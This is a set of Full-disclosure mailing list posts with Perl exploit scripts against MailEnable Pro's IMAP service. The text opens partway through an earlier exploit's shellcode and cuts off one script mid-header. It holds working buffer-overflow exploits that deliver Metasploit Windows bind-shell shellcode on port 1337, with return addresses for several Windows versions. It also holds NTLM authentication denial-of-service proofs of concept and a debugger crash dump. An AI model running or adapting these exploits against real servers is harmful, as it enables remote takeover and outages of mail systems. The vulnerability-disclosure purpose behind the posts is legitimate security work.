  "\xe2\x1a\x67\x96\xcd\xaa\x58\x0d\x7b\xa4\x51\x04\x94\x29\x58\x39".
  "\x44\xe5\xfe\xe0\xfa\xa6\x76\xe0\xff\xfd\xf2\x9a\xb7\x32\x70\x44".
  "\xe3\x8e\x1e\xfa\x90\xb6\x0a\xc2\xb6\x67\x5a\x1b\xe3\x7f\x24\x96".
  "\x68\x88\xcd\xbf\x46\x9b\x60\x38\x4c\x9d\x58\x68\x4c\x9d\x67\x38".
  "\xe2\x1c\x5a\xc4\xc4\xc9\xfc\x3a\xe2\x1a\x58\x96\xe2\xfb\xcd\xb9".
  "\x96\x9b\xce\xea\xd9\xa8\xcd\xbf\x4f\x33\xe2\x01\xf2\x02\xd2\x09".
  "\x4e\x33\xe4\x96\xcd\xcc\x32\x69";

# ff e4 - jmp %esp
my @offsets = (
  "\x63\x37\x57\x7c",   # Win2K Server SP4 KERNEL32.dll
  "\x38\x07\xd2\x77",
  "\xef\xbe\xad\xde"    # DoS
);

print_header;

my $target;
my $offset;
my $user;
my $passwd;

if (defined($arg{'t'})) { $target = $arg{'t'} }
if (defined($arg{'n'})) { $offset = $arg{'n'} }
if (defined($arg{'u'})) { $user = $arg{'u'} }
if (defined($arg{'p'})) { $passwd = $arg{'p'} }

if (!(defined($target)) || !(defined($user)) || !(defined($passwd))) {
  usage;
}

if (!(defined($offset))) {
  $offset = 0;
}

if ($offset > $#offsets) {
  print("only ".($#offsets+1)." targets known!!\n");
  exit(1);
} else {
  $offset = $offsets[$offset];
}

my $imapd_port = 143;
my $send_delay = 2;
my $NOP = 'A';

if (connect_host($target, $imapd_port)) {
  print("-> * Connected\n");
  send(SOCKET, "1 LOGIN ".$user." ".$passwd."\r\n", 0);
  sleep($send_delay);

  print("-> * Sending payload\n");
  $buf = "2 APPEND \"()\"\{".
         ($NOP x 128).
         "\xef\xbe\xad\xde".
         $offset.
         "\x01\xa3\x19\x03".
         ($NOP x 8).
         $zshell_win32_bind.
         "\}\r\n";
  send(SOCKET, $buf, 0);
  sleep($send_delay);

  print("-> * Successfully sent payload!\n");
  print("-> * nc ".$target." 1337 for shell...\n");
}

sub print_header {
  print("MailEnable Pro v2.32-7 remote exploit\n");
  print("by: [EMAIL PROTECTED]\n\n");
}

sub usage {
  print(qq(Usage: $0 -t <hostname>

     -t <hostname>: hostname to test
     -n <num>     : return addy offset number
     -u <username>: username for login
     -p <password>: usernames password

  ));
  exit(1);
}

sub connect_host {
  ($target, $port) = @_;

  $iaddr = inet_aton($target) || die("Error: $!\n");
  $paddr = sockaddr_in($port, $iaddr) || die("Error: $!\n");
  $proto = getprotobyname('tcp') || die("Error: $!\n");

  socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
  connect(SOCKET, $paddr) || die("Error: $!\n");

  return(1338);
}
[Full-disclosure] More MailEnable exploits..
The following should somewhat specify any mention of unspecified in the following BID's, patched as some idiots cannot resist trying to own mailenable.com...

BID: 21252 (maildisable-v3.pl)
BID: 21492 (maildisable-v6.pl)

--- ([EMAIL PROTECTED])

#!/usr/bin/perl
#
# maildisable-v3.pl
#
# Mail Enable Professional/Enterprise v2.32-4 (win32) remote exploit
# by mu-b - Thu Nov 23 2006
#
# - Tested on: Mail Enable Professional v2.32 (win32) - with HOTFIX
#              Mail Enable Professional v2.33 (win32)
#              Mail Enable Professional v2.34 (win32)
#
# what does this remind you of?
# Note: timing is quite critical with this!!, so change $send_delay
# if it doesn't work
#

use Getopt::Std; getopts('t:n:', \%arg);
use Socket;

# metasploit win32 bindshell port 1337
my $zshell_win32_bind =
  "\x33\xc9\x83\xe9\xb0".
  "\x81\xc4\xd0\xfd\xff\xff".
  "\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x1d".
  "\xcc\x32\x69\x83\xeb\xfc\xe2\xf4\xe1\xa6\xd9\x24\xf5\x35\xcd\x96".
  "\xe2\xac\xb9\x05\x39\xe8\xb9\x2c\x21\x47\x4e\x6c\x65\xcd\xdd\xe2".
  "\x52\xd4\xb9\x36\x3d\xcd\xd9\x20\x96\xf8\xb9\x68\xf3\xfd\xf2\xf0".
  "\xb1\x48\xf2\x1d\x1a\x0d\xf8\x64\x1c\x0e\xd9\x9d\x26\x98\x16\x41".
  "\x68\x29\xb9\x36\x39\xcd\xd9\x0f\x96\xc0\x79\xe2\x42\xd0\x33\x82".
  "\x1e\xe0\xb9\xe0\x71\xe8\x2e\x08\xde\xfd\xe9\x0d\x96\x8f\x02\xe2".
  "\x5d\xc0\xb9\x19\x01\x61\xb9\x29\x15\x92\x5a\xe7\x53\xc2\xde\x39".
  "\xe2\x1a\x54\x3a\x7b\xa4\x01\x5b\x75\xbb\x41\x5b\x42\x98\xcd\xb9".
  "\x75\x07\xdf\x95\x26\x9c\xcd\xbf\x42\x45\xd7\x0f\x9c\x21\x3a\x6b".
  "\x48\xa6\x30\x96\xcd\xa4\xeb\x60\xe8\x61\x65\x96\xcb\x9f\x61\x3a".
  "\x4e\x9f\x71\x3a\x5e\x9f\xcd\xb9\x7b\xa4\x37\x50\x7b\x9f\xbb\x88".
  "\x88\xa4\x96\x73\x6d\x0b\x65\x96\xcb\xa6\x22\x38\x48\x33\xe2\x01".
  "\xb9\x61\x1c\x80\x4a\x33\xe4\x3a\x48\x33\xe2\x01\xf8\x85\xb4\x20".
  "\x4a\x33\xe4\x39\x49\x98\x67\x96\xcd\x5f\x5a\x8e\x64\x0a\x4b\x3e".
  "\xe2\x1a\x67\x96\xcd\xaa\x58\x0d\x7b\xa4\x51\x04\x94\x29\x58\x39".
  "\x44\xe5\xfe\xe0\xfa\xa6\x76\xe0\xff\xfd\xf2\x9a\xb7\x32\x70\x44".
  "\xe3\x8e\x1e\xfa\x90\xb6\x0a\xc2\xb6\x67\x5a\x1b\xe3\x7f\x24\x96".
  "\x68\x88\xcd\xbf\x46\x9b\x60\x38\x4c\x9d\x58\x68\x4c\x9d\x67\x38".
  "\xe2\x1c\x5a\xc4\xc4\xc9\xfc\x3a\xe2\x1a\x58\x96\xe2\xfb\xcd\xb9".
  "\x96\x9b\xce\xea\xd9\xa8\xcd\xbf\x4f\x33\xe2\x01\xf2\x02\xd2\x09".
  "\x4e\x33\xe4\x96\xcd\xcc\x32\x69";

# ff e4 - jmp %esp
my @offsets = (
  "\xf8\xfe\x5a\x7c",   # Win2K Server SP4 KERNEL32.dll 5.0.2195.7099
  "\xe2\x48\xe6\x77",   # WinXP SP0 KERNEL32.dll 5.1.2600.0
  "\x06\x38\xe6\x77",   # WinXP SP1 KERNEL32.dll 5.1.2600.11061
  "\xd9\xae\x80\x7c",   # WinXP SP2 KERNEL32.dll 5.1.2600.21802
  "\x62\x51\xeb\x77",   # Win2K3 SP1 KERNEL32.dll 5.2.3790.18300
  "\xef\xbe\xad\xde"    # DoS
);

print_header;

my $target;
my $offset;

if (defined($arg{'t'})) { $target = $arg{'t'} }
if (defined($arg{'n'})) { $offset = $arg{'n'} }

if (!(defined($target))) {
  usage;
}

if (!(defined($offset))) {
  $offset = 0;
}

if ($offset > $#offsets) {
  print("only ".($#offsets+1)." targets known!!\n");
  exit(1);
} else {
  $offset = $offsets[$offset];
}

my $imapd_port = 143;
my $send_delay = 2;
my $NOP = 'A';
my $START_PAD = 3;

if (connect_host($target, $imapd_port)) {
  print("-> * Connected\n");
  send(SOCKET, "1 LOGIN {1022}\r\n", 0);
  sleep(2);

  print("-> * Sending padding payload\n");
  # first recv 0x3fe, NULL tricks strncpy...
  send(SOCKET, "\x00".($NOP x 1020), 0);
  sleep($send_delay);

  print("-> * Sending payload\n");
  $buf = ($NOP x $START_PAD).       # padding
         "\xee\xaf\xdc\xba".        # dummy var_0
         "\xef\xbe\xad\xde".        # EBP
         $offset.                   # EIP
         "\xdc\xa3\x19\x03".        # dummy arg_0 \xdc\xa3\x19\x03 v2.33
         ($NOP x 4).                # NOPS
         $zshell_win32_bind.        # hellcode
         $NOP x (0x3fd-$START_PAD-16-length($zshell_win32_bind)-5);
  send(SOCKET, $buf, 0);
  sleep($send_delay);

  print("-> * Successfully sent payload!\n");
  print("-> * nc ".$target." 1337 for shell...\n");
}

sub print_header {
  print("MailEnable Pro v2.32-4 (HOTFIX) remote exploit\n");
  print("by: [EMAIL PROTECTED]\n\n");
}

sub usage {
  print(qq(Usage: $0 -t <hostname>

     -t <hostname>: hostname to test
     -n <num>     : return addy offset number

  ));
  exit(1);
}

sub connect_host {
  ($target, $port) = @_;

  $iaddr = inet_aton($target) || die("Error: $!\n");
  $paddr = sockaddr_in($port, $iaddr) || die("Error: $!\n");
  $proto = getprotobyname('tcp') || die("Error: $!\n");

  socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
  connect(SOCKET, $paddr) || die("Error: $!\n");

  return(1338);
}

#!/usr/bin/perl
#
# maildisable-v6.pl
#
# Mail Enable Professional <=v2.35 (win32) remote exploit
# by mu-b - Tue Dec 5 2006
#
# - Tested on: Mail Enable Professional v2.35 (win32)
#
# Note: timing
[Full-disclosure] MailEnable DoS POC
The POC attached exploits an out of bounds memory read in the NTLM authentication routines of MailEnable Pro/Enterprise. The problem lies in the NTLM_UnPack_Type3 function of MENTLM.dll. This appears to have been 'silently patched' somewhere between versions 2.351 and 2.36-7 (observe the quotes).

(c34.dc0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=8146930b ebx=003a6cc8 ecx=00000040 edx=00000000 esi=8146920b edi=0146b238
eip=0109b4b3 esp=014691e4 ebp=014691ec iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010212
MENTLM!NTLM_UnPack_Type3+0x3019:
0109b4b3 f3a5            rep movs dword ptr es:[edi],dword ptr [esi]  es:0023:0146b238=00000000 ds:0023:8146920b=00000000

--- ([EMAIL PROTECTED])

#!/usr/bin/perl
#
# maildisable-v5.pl
#
# Mail Enable Professional/Enterprise <=v2.35 (win32)
# by mu-b - Wed Nov 29 2006
#
# - Tested on: Mail Enable Professional v2.32 (win32) - with HOTFIX
#              Mail Enable Professional v2.33 (win32)
#              Mail Enable Professional v2.34 (win32)
#              Mail Enable Professional v2.35 (win32)
#
# out of bounds read == DoS
#

use Getopt::Std; getopts('t:', \%arg);
use Socket;
use MIME::Base64;

print_header;

my $target;

if (defined($arg{'t'})) { $target = $arg{'t'} }

if (!(defined($target))) {
  usage;
}

my $imapd_port = 143;
my $send_delay = 2;
my $PAD = 'A';

if (connect_host($target, $imapd_port)) {
  print("-> * Connected\n");
  send(SOCKET, "1 AUTHENTICATE NTLM\r\n", 0);
  sleep($send_delay);

  $buf = ($PAD x 12).
         "\xfa\xff\xff\xff".
         ($PAD x 12);
  send(SOCKET, encode_base64($buf)."\r\n", 0);
  sleep($send_delay);

  $buf = ($PAD x 28).
         "\x00\x01".
         ($PAD x 2).
         "\xef\xbe\xad\xde";
  send(SOCKET, encode_base64($buf)."\r\n", 0);
  sleep($send_delay);

  print("-> * Successfully sent payload!\n");
}

sub print_header {
  print("MailEnable Pro =v2.36 DoS POC\n");
  print("by: [EMAIL PROTECTED]\n\n");
}

sub usage {
  print(qq(Usage: $0 -t <hostname>

     -t <hostname>: hostname to test

  ));
  exit(1);
}

sub connect_host {
  ($target, $port) = @_;

  $iaddr = inet_aton($target) || die("Error: $!\n");
  $paddr = sockaddr_in($port, $iaddr) || die("Error: $!\n");
  $proto = getprotobyname('tcp') || die("Error: $!\n");

  socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
  connect(SOCKET, $paddr) || die("Error: $!\n");

  return(1338);
}
[Full-disclosure] MailEnable DoS POC-2
This version will work on the latest MailEnable v2.37.. Symantec seem to think this is the same issue as BID 20290, but it is in fact completely different... and somewhat unpatched..

--- ([EMAIL PROTECTED])

#!/usr/bin/perl
#
# maildisable-v7.pl
#
# Mail Enable Professional/Enterprise v2.32-7 (win32)
# by mu-b - Wed Feb 14 2007
#
# - Tested on: Mail Enable Professional v2.37 (win32)
#

use Getopt::Std; getopts('t:', \%arg);
use Socket;
use MIME::Base64;

print_header;

my $target;

if (defined($arg{'t'})) { $target = $arg{'t'} }

if (!(defined($target))) {
  usage;
}

my $imapd_port = 143;
my $send_delay = 2;
my $PAD = 'A';

if (connect_host($target, $imapd_port)) {
  print("-> * Connected\n");
  send(SOCKET, "1 AUTHENTICATE NTLM\r\n", 0);
  sleep($send_delay);

  $buf = ($PAD x 12).
         "\xfa\xff\xff\xff".
         ($PAD x 12);
  send(SOCKET, encode_base64($buf)."\r\n", 0);
  sleep($send_delay);

  $buf = ($PAD x 28).
         "\x00\x01".
         ($PAD x 2).
         "\xff\xff\xff\x7f";
  send(SOCKET, encode_base64($buf)."\r\n", 0);
  sleep($send_delay);

  print("-> * Successfully sent payload!\n");
}

sub print_header {
  print("MailEnable Pro v2.37 DoS POC\n");
  print("by: [EMAIL PROTECTED]\n\n");
}

sub usage {
  print(qq(Usage: $0 -t <hostname>

     -t <hostname>: hostname to test

  ));
  exit(1);
}

sub connect_host {
  ($target, $port) = @_;

  $iaddr = inet_aton($target) || die("Error: $!\n");
  $paddr = sockaddr_in($port, $iaddr) || die("Error: $!\n");
  $proto = getprotobyname('tcp') || die("Error: $!\n");

  socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
  connect(SOCKET, $paddr) || die("Error: $!\n");

  return(1338);
}